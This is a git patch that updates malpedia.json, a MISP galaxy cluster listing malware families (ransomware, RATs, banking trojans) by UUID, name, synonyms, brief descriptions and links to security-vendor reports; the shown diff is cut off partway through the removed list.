From 125f676d173d413111129a4161d0f3e474bca506 Mon Sep 17 00:00:00 2001
From: Steffen Enders
Date: Wed, 10 Oct 2018 17:31:27 +0200
Subject: [PATCH 1/2] Updated malpedia.json to the current state

Fetched the new malpedia galaxy cluster from https://malpedia.caad.fkie.fraunhofer.de/api/get/misp - this includes an additional ~120 new families.
---
clusters/malpedia.json | 29250 +++++++++++++++++++++------------------
1 file changed, 15952 insertions(+), 13298 deletions(-)

diff --git a/clusters/malpedia.json b/clusters/malpedia.json
index ed35fe8..256f76f 100644
--- a/clusters/malpedia.json
+++ b/clusters/malpedia.json
@@ -1,13300 +1,15954 @@ { - "description": "Malware galaxy based on Malpedia archive.", - "type": "malpedia", - "authors": [ - "Daniel Plohmann", - "Andrea Garavaglia", - "Davide Arcuri" - ], - "values": [ - { - "uuid": "9ee0eb87-7648-4581-b301-7472a48946ad", - "value": "reGeorg", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://sensepost.com/discover/tools/reGeorg/", - "https://github.com/sensepost/reGeorg" - ] - } - }, - { - "uuid": "e6005ce5-3e3d-4dfb-8de7-3da45e89e549", - "value": "Quant Loader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", - "https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground", - "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", - "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/" - ] - } - }, - { - "uuid": "abd22cec-49ee-431f-a2e6-e4722b3e44bb", - "value": "Unidentified 049 (Lazarus/RAT)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/" - ] - } - }, - { - "uuid": "31615066-dbff-4134-b467-d97a337b408b", - "value": "HawkEye Keylogger", - "description": "", - "meta": { - "synonyms": [ - "Predator Pain" - ], - "type": [], - "refs": [ - "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/", - 
"https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html", - "http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html", - "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/" - ] - } - }, - { - "uuid": "96bb088c-7bb7-4a07-a9d7-a3cbb45d5755", - "value": "Kegotip", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "53e94bc9-c8d2-4fb6-9c02-00841e454050", - "value": "Rover", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/" - ] - } - }, - { - "uuid": "a6f481fe-b6db-4507-bb3c-28f10d800e2f", - "value": "Loki", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/" - ] - } - }, - { - "uuid": "2d07a1bf-1d8d-4f1e-a02f-1a8ff5b76cd1", - "value": "Vermin", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/" - ] - } - }, - { - "uuid": "4d9d0223-32fe-49cf-8608-0e154359528a", - "value": "LokiBot", - "description": "Android banker Trojan with the standard banking capabilities such as overlays, SMS stealing. It also features ransomware functionality. 
Note, the network traffic is obfuscated the same way as in Android Bankbot.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html" - ] - } - }, - { - "uuid": "8faf7592-be5c-44af-b1ca-2bd8caec195d", - "value": "Leash", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" - ] - } - }, - { - "uuid": "5424d89e-1b7a-4632-987b-67fd27621d6f", - "value": "Unidentified 022 (Ransom)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "bfa75eb1-1d8d-4127-932f-3b7090a242e9", - "value": "Wonknu", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/" - ] - } - }, - { - "uuid": "df9c8440-b4da-4226-b982-e510d06cf246", - "value": "Unidentified 044", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "6b6cf608-cc2c-40d7-8500-afca3e35e7e4", - "value": "Wipbot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf" - ] - } - }, - { - "uuid": "2894aee2-e0ec-417a-811e-74a68ab967b2", - "value": "Remcos", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://malware-traffic-analysis.net/2017/12/22/index.html", - "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2", - "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/", - "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/", - "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/", - 
"https://secrary.com/ReversingMalware/RemcosRAT/" - ] - } - }, - { - "uuid": "6fb5bfff-4b10-43a4-ad3c-a1578f39e83e", - "value": "CradleCore", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blogs.forcepoint.com/security-labs/cradlecore-ransomware-source-code-sale" - ] - } - }, - { - "uuid": "b0467c03-824f-4071-8668-f056110d2a50", - "value": "Taleret", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", - "http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html" - ] - } - }, - { - "uuid": "d327b4d9-e1c8-4c71-b9fe-775d1607e7d4", - "value": "SynFlooder", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - } - }, - { - "uuid": "782bee33-9f8d-41df-a608-c014bd6a7de1", - "value": "Poweliks Dropper", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users" - ] - } - }, - { - "uuid": "044849d3-d0de-4f78-b67d-bfbe8dd3a255", - "value": "Vflooder", - "description": "Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services are negligible, but for researchers it can be a nuisance. Most versions are protectd by VMProtect.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2017/10/analyzing-malware-by-api-calls/" - ] - } - }, - { - "uuid": "79a7203a-6ea5-4c39-abd4-faa20cf8821a", - "value": "Cerber", - "description": "A prolific ransomware which originally added \".cerber\" as a file extension to encrypted files. Has undergone multiple iterations in which the extension has changed. 
Uses a very readily identifiable set of of UDP activity to checkin and report infections. Primarily uses TOR for payment information.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/", - "https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/", - "https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/" - ] - } - }, - { - "uuid": "a4b9c526-42d0-4de9-ab8e-e78f99655d11", - "value": "SysGet", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" - ] - } - }, - { - "uuid": "67fc358f-da6a-4f01-be23-44bc97319127", - "value": "Shim RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf" - ] - } - }, - { - "uuid": "f7aae3bc-4a46-4334-a28e-35650289dd1a", - "value": "Uroburos", - "description": "", - "meta": { - "synonyms": [ - "Snake" - ], - "type": [], - "refs": [] - } - }, - { - "uuid": "80447111-8085-40a4-a052-420926091ac6", - "value": "AndroRAT", - "description": "Androrat is a remote administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. 
The goal of the application is to give the control of the android system remotely and retrieve informations from it.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/DesignativeDave/androrat", - "https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html" - ] - } - }, - { - "uuid": "cb5bad79-707c-493d-8a2b-4c0be38301c5", - "value": "CodeKey", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf" - ] - } - }, - { - "uuid": "5a78ec38-8b93-4dde-a99e-0c9b77674838", - "value": "TinyNuke", - "description": "TinyNuke is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. The author destroyed his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on Github. XBot is an off-spring of TinyNuke, but very similar to its ancestor.", - "meta": { - "synonyms": [ - "Xbot", - "MicroBankingTrojan", - "NukeBot", - "Nuclear Bot" - ], - "type": [], - "refs": [ - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4596", - "https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702", - "https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet", - "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html", - "https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/", - "https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/", - "https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/" - ] - } - }, - { - "uuid": "ccde5b0d-fe13-48e6-a6f4-4e434ce29371", - "value": "UACMe", - "description": "A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 
7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.", - "meta": { - "synonyms": [ - "Akagi" - ], - "type": [], - "refs": [ - "https://github.com/hfiref0x/UACME" - ] - } - }, - { - "uuid": "271752e3-67ca-48bc-ade2-30eec11defca", - "value": "RadRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://labs.bitdefender.com/2018/04/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/" - ] - } - }, - { - "uuid": "212d1ed7-0519-412b-a1ce-56046ca93372", - "value": "SNEEPY", - "description": "", - "meta": { - "synonyms": [ - "ByeByeShell" - ], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/" - ] - } - }, - { - "uuid": "d1597713-fe7a-45bd-8b59-1a13c7e097d8", - "value": "Misdat", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf" - ] - } - }, - { - "uuid": "ac4fbbb0-9a21-49ce-be82-e44cb02a7819", - "value": "DreamBot", - "description": "2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n2014 Dreambot (Gozi ISFB variant)\r\n\r\nIn 2014, a variant of Gozi ISFB was developed. Mainly, the dropper performs additional anti-vm checks (vmware, vbox, qemu), while the actual bot-dll remains unchanged in most parts. 
New functionality, such as TOR support, was added though and often, the Fluxxy fast-flux network is used.\r\n\r\nSee win.gozi for additional historical information.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://lokalhost.pl/gozi_tree.txt", - "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality" - ] - } - }, - { - "uuid": "838e2a3a-c4cb-4bee-b07f-c97b143c68d6", - "value": "OneKeyLocker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/malwrhunterteam/status/1001461507513880576" - ] - } - }, - { - "uuid": "2637315d-d31e-4b64-aa4b-2fc265b0a1a3", - "value": "HesperBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "d9e6adf2-4f31-48df-a7ef-cf25d299f68c", - "value": "GlassRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://community.rsa.com/community/products/netwitness/blog/2015/11/25/detecting-glassrat-using-security-analytics-and-ecat" - ] - } - }, - { - "uuid": "4ec40af9-0295-4b9a-81ad-b7017a21609d", - "value": "BackSwap", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/", - "https://www.cert.pl/en/news/single/backswap-malware-analysis/" - ] - } - }, - { - "uuid": "ae4aa1ef-4da0-4952-9583-9d47f84edad9", - "value": "CryptoFortress", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/", - "https://www.lexsi.com/securityhub/cryptofortress/?lang=en", - "http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html" - ] - } - }, - { - "uuid": "3eae1764-7ea6-43e6-85a1-b1dd0b4856b8", - "value": "vSkimmer", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"http://www.xylibox.com/2013/01/vskimmer.html", - "http://vkremez.weebly.com/cyber-security/-backdoor-win32hesetoxa-vskimmer-pos-malware-analysis", - "https://securingtomorrow.mcafee.com/mcafee-labs/vskimmer-botnet-targets-credit-card-payment-terminals/" - ] - } - }, - { - "uuid": "73806c57-cef8-4f7b-a78b-7949ef83b2c2", - "value": "GlobeImposter", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/", - "https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant", - "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run", - "https://isc.sans.edu/diary/23417", - "https://blog.ensilo.com/globeimposter-ransomware-technical", - "https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet" - ] - } - }, - { - "uuid": "0e435b5d-37df-47cc-a1c4-1afb82df83d1", - "value": "Unidentified 003", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "70f6c71f-bc0c-4889-86e3-ef04e5b8415b", - "value": "Daserf", - "description": "", - "meta": { - "synonyms": [ - "Nioupale", - "Muirim" - ], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", - "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", - "https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/" - ] - } - }, - { - "uuid": "9de41613-7762-4a88-8e9a-4e621a127f32", - "value": "Morphine", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "c1144eb8-a2bc-48d7-b0fb-18f124c1f8d9", - "value": "MajikPos", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/" - ] - } - }, - { - "uuid": "5f427b3a-7162-4421-b2cd-e6588d518448", - "value": "ATMitch", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/" - ] - } - }, - { - "uuid": "e3adbb0d-6d6e-4686-8108-ee76452339bf", - "value": "ScanPOS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos", - "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware" - ] - } - }, - { - "uuid": "05252643-093b-4070-b62f-d5836683a9fa", - "value": "Quasar RAT", - "description": "Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", - "https://github.com/quasar/QuasarRAT/tree/master/Client", - "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite", - "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/", - "https://twitter.com/malwrhunterteam/status/789153556255342596", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments" - ] - } - }, - { - "uuid": "48cdcbcf-38a8-4c68-a85e-42989ca28861", - "value": "Icefog", - "description": "", - "meta": { - "synonyms": [], - "type": [], - 
"refs": [ - "http://www.kz-cert.kz/page/502" - ] - } - }, - { - "uuid": "d073f9e5-8aa8-4e66-ba47-f332759199a2", - "value": "Unidentified 037", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "1c27b1a3-ea2a-45d2-a982-12e1509aa4ad", - "value": "Glasses", - "description": "", - "meta": { - "synonyms": [ - "Wordpress Bruteforcer" - ], - "type": [], - "refs": [ - "https://forum.exploit.in/pda/index.php/t102378.html" - ] - } - }, - { - "uuid": "3c74a04d-583e-40ec-b347-bdfeb534c614", - "value": "ZhCat", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - } - }, - { - "uuid": "4ff34778-de4b-4f48-9184-4975c8ccc3f3", - "value": "Koler", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/LukasStefanko/status/928262059875213312" - ] - } - }, - { - "uuid": "34c6504b-e947-49d8-a963-62b7594b7ef9", - "value": "Sanny", - "description": "", - "meta": { - "synonyms": [ - "Daws" - ], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html" - ] - } - }, - { - "uuid": "6c09cc53-7160-47c6-8df8-3e0d42deb5a6", - "value": "Micrass", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" - ] - } - }, - { - "uuid": "a673b4fb-a864-4a5b-94ab-3fc4f5606cc8", - "value": "Yahoyah", - "description": "", - "meta": { - "synonyms": [ - "KeyBoy" - ], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" - ] - } - }, - { - "uuid": "dcd1f76d-5a40-4c58-b01e-a749871fe50b", - "value": "Limitail", - "description": "", - "meta": { - 
"synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "d3af810f-e657-409c-b821-4b1cf727ad18", - "value": "Bolek", - "description": "", - "meta": { - "synonyms": [ - "KBOT" - ], - "type": [], - "refs": [ - "https://asert.arbornetworks.com/communications-bolek-trojan/", - "http://www.cert.pl/news/11379" - ] - } - }, - { - "uuid": "9c90b876-e94d-4ea5-9f30-fdc6dd6b5aef", - "value": "Dharma", - "description": "", - "meta": { - "synonyms": [ - "Arena", - "Crysis" - ], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/" - ] - } - }, - { - "uuid": "026d638b-cc51-4eff-97fc-d61215a1a70a", - "value": "ModPOS", - "description": "", - "meta": { - "synonyms": [ - "straxbot" - ], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2015/11/modpos.html", - "https://twitter.com/physicaldrive0/status/670258429202530306" - ] - } - }, - { - "uuid": "878ab9fc-a526-43bd-81ac-3eba14ba0f1f", - "value": "Unidentified 046", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/DrunkBinary/status/1006534471687004160" - ] - } - }, - { - "uuid": "40fc6f71-75ac-43ac-abd9-c90b0e847999", - "value": "CreativeUpdater", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/", - "https://objective-see.com/blog/blog_0x29.html", - "https://digitasecurity.com/blog/2018/02/05/creativeupdater/" - ] - } - }, - { - "uuid": "1de27925-f94c-462d-acb6-f75822e05ec4", - "value": "Gravity RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/", - "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html" - ] - } - }, - { - "uuid": "f4cac204-3d3f-4bb6-84bd-fc27b2f5158c", - "value": 
"SOUNDBITE", - "description": "", - "meta": { - "synonyms": [ - "denis" - ], - "type": [], - "refs": [ - "https://attack.mitre.org/wiki/Software/S0157", - "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" - ] - } - }, - { - "uuid": "827490bf-19b8-4d14-83b3-7da67fbe436c", - "value": "Datper", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", - "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", - "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html" - ] - } - }, - { - "uuid": "e701b875-8ade-434f-89ff-6c367099bfd8", - "value": "FF RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cylance.com/en_us/blog/breaking-down-ff-rat-malware.html" - ] - } - }, - { - "uuid": "dcdd98a7-aad2-4a96-a787-9c4665bbb1b8", - "value": "CycBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2011/07/14/cycbot-ready-to-ride/" - ] - } - }, - { - "uuid": "8a789016-5f8d-4cd9-ba96-ba253db42fd8", - "value": "pupy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations", - "https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/", - "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", - "https://github.com/n1nj4sec/pupy" - ] - } - }, - { - "uuid": "c1b9e8c5-9283-4dbe-af10-45956a446fb7", - "value": "AlphaLocker", - "description": "A new form of ransomware named AlphaLocker that is built by cybercriminals for cybercriminals. 
Like all incarnations of Ransomware As A Service (RaaS), the AlphaLocker malware program can be purchased and launched by pretty much anyone who wants to get into the ransomware business. What makes AlphaLocker different from other forms of RaaS is its relatively cheap cost. The ransomware can be purchased for just $65 in bitcoin.\r\n\r\nAlphaLocker, also known as Alpha Ransomware, is based on the EDA2 ransomware, an educational project open-sourced on GitHub last year by Turkish researcher Utku Sen. A Russian coder seems to have cloned this repository before it was taken down and used it to create his ransomware, a near-perfect clone of EDA2. The ransomware's author, is said to be paying a great deal of attention to updating the ransomware with new features, so it would always stay ahead of antivirus engines, and evade detection.\r\n\r\nAlphaLocker's encryption process starts when the ransomware contacts its C&C server. The server generates a public and a private key via the RSA-2048 algorithm, sending the public key to the user's computer and saving the private key to its server. On the infected computer, the ransomware generates an AES-256 key for each file it encrypts, and then encrypts this key with the public RSA key, and sent to the C&C server.\r\n\r\nTo decrypt their files, users have to get ahold of the private RSA key which can decrypt the AES-encrypted files found on their computers. 
Users have to pay around 0.35 Bitcoin (~$450) to get this key, packaged within a nice decrypter.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.cylance.com/an-introduction-to-alphalocker" - ] - } - }, - { - "uuid": "f2b0ffdc-7d4e-4786-8935-e7036faa174d", - "value": "Unidentified 050 (APT32 Profiler)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f", - "https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef" - ] - } - }, - { - "uuid": "fab34d66-5668-460a-bc0f-250b9417cdbf", - "value": "TURNEDUP", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" - ] - } - }, - { - "uuid": "23398248-a52a-4a7c-af10-262822d33a4e", - "value": "backspace", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" - ] - } - }, - { - "uuid": "44168d77-338d-46ad-a5f6-c17c2b6b0631", - "value": "Devil's Rat", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "92d87656-5e5b-410c-bdb6-bf028324dc72", - "value": "RoyalCli", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/nccgroup/Royal_APT", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" - ] - } - }, - { - "uuid": "bc1fc21d-80c0-4629-bb18-d5ae1df2a431", - "value": "RapidStealer", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://pwc.blogs.com/cyber_security_updates/2014/09/malware-microevolution.html" - ] - } - }, - { - "uuid": "d238262a-4832-408f-9926-a7174e671b50", - "value": "WaterSpout", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html"
- ]
- }
- },
- {
- "uuid": "dd9939a4-df45-4c7c-8a8d-83b40766aacd",
- "value": "SuppoBox",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": []
- }
- },
- {
- "uuid": "b96be762-56a0-4407-be04-fcba76c1ff29",
- "value": "HiddenTear",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/",
- "https://twitter.com/struppigel/status/950787783353884672",
- "https://github.com/goliate/hidden-tear"
- ]
- }
- },
- {
- "uuid": "d97ae60e-612a-4feb-908a-8c4d32e9d763",
- "value": "Brambul",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.us-cert.gov/ncas/alerts/TA18-149A",
- "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A",
- "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/"
- ]
- }
- },
- {
- "uuid": "d31f1c73-d14b-41e2-bb16-81ee1d886e43",
- "value": "SHARPKNOT",
- "description": "",
- "meta": {
- "synonyms": [
- "Bitrep"
- ],
- "type": [],
- "refs": [
- "https://eromang.zataz.com/tag/agentbase-exe/",
- "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf"
- ]
- }
- },
- {
- "uuid": "da2969f2-01e9-4ca8-b2f3-5fc9a9891d57",
- "value": "StrongPity",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://twitter.com/physicaldrive0/status/786293008278970368",
- "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/",
- "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/",
- "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/"
- ]
- }
- },
- {
- "uuid": "c9d78931-318c-4b34-af33-c90f6612a4f1",
- "value": "Furtim",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://sentinelone.com/blogs/sfg-furtims-parent/",
- "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4341&sid=af76b944112a234fa933cc934d21cd9f"
- ]
- }
- },
- {
- "uuid": "add29684-94b7-4c75-a43b-d039c4b76158",
- "value": "pgift",
